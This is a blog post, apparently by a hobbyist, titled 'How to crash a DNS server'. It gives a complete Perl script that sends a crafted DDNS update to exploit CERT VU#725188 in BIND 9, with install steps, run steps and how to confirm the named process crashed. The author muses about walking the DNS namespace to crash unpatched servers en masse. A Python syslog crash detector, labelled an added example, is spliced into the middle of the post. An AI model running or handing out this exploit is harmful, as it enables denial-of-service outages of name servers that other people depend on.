How to crash a DNS server

I had a spare hour this evening, so thought I would have a play with a Perl script I found that exploits the CERT vulnerability announced a few months ago (CERT VU#725188 BIND 9 vulnerable to DoS via DDNS).

Sure enough, any name server that has not yet been patched and is configured with the 127.0.0.1 PTR loopback record (which should be all of them!) can be crashed. Here’s how…

Download, compile and install the following Perl modules in this order:

Digest::MD5
Digest::SHA1
Digest::HMAC
Net::IP
Net::DNS

Copy the following code and call it crash.pl…

#!/usr/bin/perl -w
use strict;
use Net::DNS;

# IP address of the name server the update is sent to (change this)
our $NSI = '192.168.10.249';

my $rzone = "0.0.127.in-addr.arpa";   # reverse zone for 127.0.0.0/8
my $rptr  = "1.$rzone";               # name of the 127.0.0.1 PTR record

# Build a dynamic update (RFC 2136) message for the reverse zone
my $packet = Net::DNS::Update->new($rzone);

# Prerequisite section entry: class IN, type ANY, TTL 0
$packet->push(
    pre => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'IN',
        Type  => 'ANY',
        TTL   => 0,
    )
);

# Update section entry: class ANY, type ANY (delete all RRsets at the name)
$packet->push(
    update => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'ANY',
        Type  => 'ANY',
    )
);

print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

Change the IP address in the line “our $NSI” to contain the IP address of your name server.

Now type perl crash.pl. You should see the output of a DNS update, and then it will hang. Press Ctrl-C, run ps -ef | grep named, and you should see that the named process has gone. Check syslog and you should see an assertion failure – oops! Of course, if BIND has been patched then everything should be fine. But I bet there’s loads of people who haven’t patched. And I don’t think this vuln got anywhere near as much publicity as the Kaminsky vuln published in 2008. It would be quite trivial to walk the DNS name space and send updates of this nature to all the NS records. I wonder how many name servers would crash? 😉
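As an added example (not part of the original post), here is a small Python check that runs over constructed syslog lines of the kind you would look for after such a crash: it flags a named assertion failure, ties it to the last dynamic update that process logged, and notes whether named came back under a new PID. The log message formats are approximations of BIND's, and the source file, line number and REQUIRE() condition in the sample are placeholders.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample syslog excerpt (not taken from the page). The source file,
# line number and REQUIRE() condition on the assertion line are placeholders.
SAMPLE_SYSLOG = """\
Jul 29 20:41:02 ns1 named[2117]: client 192.0.2.10#51234: updating zone '0.0.127.in-addr.arpa/IN': deleting rrset at '1.0.0.127.in-addr.arpa' ANY
Jul 29 20:41:02 ns1 named[2117]: db.c:0: REQUIRE(placeholder_condition) failed
Jul 29 20:41:02 ns1 named[2117]: exiting (due to assertion failure)
Jul 29 20:43:15 ns1 named[2301]: starting BIND 9.x.y
"""

LINE_RE = re.compile(r"^\S+ +\d+ [\d:]+ (\S+) named\[(\d+)\]: (.*)$")
UPDATE_RE = re.compile(r"client (\S+): updating zone '([^']+)': (.*)")
ASSERT_RE = re.compile(r"^([\w./]+):(\d+): (REQUIRE|INSIST|ENSURE)\((.*)\) failed$")


@dataclass
class Crash:
    host: str
    pid: int
    assertion: str
    last_update_client: Optional[str]
    last_update_zone: Optional[str]
    restarted_as_pid: Optional[int] = None


def find_named_crashes(syslog_text: str) -> list:
    """Flag named assertion failures, correlate each with the most recent
    dynamic update the same process logged, and note a restart (new PID)."""
    crashes = []
    last_update = {}  # pid -> (client, zone) of the last logged update
    for line in syslog_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        host, pid, msg = m.group(1), int(m.group(2)), m.group(3)
        u = UPDATE_RE.match(msg)
        if u:
            last_update[pid] = (u.group(1), u.group(2))
            continue
        if ASSERT_RE.match(msg):
            client, zone = last_update.get(pid, (None, None))
            crashes.append(Crash(host, pid, msg, client, zone))
            continue
        if msg.startswith("starting BIND") and crashes:
            prev = crashes[-1]
            if prev.host == host and prev.restarted_as_pid is None and pid != prev.pid:
                prev.restarted_as_pid = pid
    return crashes
```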

Maybe when I have another spare hour… <evil grin> 😉


One Response to How to crash a DNS server

1. Paul says:

Not sure if you need the digest modules actually. The original bit of code used TSIG to authenticate the update but I took that out, meaning you may not need to make the digest modules after all.
